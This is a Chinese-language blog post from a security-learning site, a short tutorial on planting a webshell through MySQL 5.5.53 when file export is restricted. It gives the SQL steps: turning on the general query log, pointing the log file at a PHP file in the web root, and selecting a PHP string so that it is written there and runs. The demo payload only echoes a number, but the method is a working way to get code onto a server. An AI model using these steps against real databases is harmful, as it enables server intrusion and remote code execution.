登陆 注册

mysql利用log写入webshell(测试版本5.5.53)

Lzers 2018-10-12 Mysql注入
黑白网(heibai.org)成立于2014年,多年来以其专业的视角,优质的服务为广大安全技术爱好者提供了目前国内最全的网络安全技术学习资料,普及中国网络安全知识,宣扬正确的黑客极客文化,全方面提高国内安全技术水平。

0x01    前言

新版本的mysql在my.ini中设置了导出文件的路径,无法再使用select into outfile来写入一句话

图片.png

此时在mysql文件夹下的my.ini中可以设置到处路径

图片.png

但是在拿shell时,不可能去修改配置文件

可以通过修改mysql的log文件来获取webshell

0x02    过程

首先进入SQL环境,执行以下SQL语句:

show variables like "%general%";

图片.png

修改如上两个地方的值,其中修改log的地址为网站目录下的php文件,其后log文件会写入其中,修改方法

set global general_log = on;set global general_log_file = "C:/phpStudy/PHPTutorial/MySQL/6.php";

 然后执行

select "<?php echo 12344;?>"


此时在网站目录下6.PHP中就生成了一句话

图片.png

图片.png

成功执行。


生成海报
请发表您的评论
Lzers

Lzers

安全路漫漫,莫愁前方无知己
866文章数 31评论数
请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.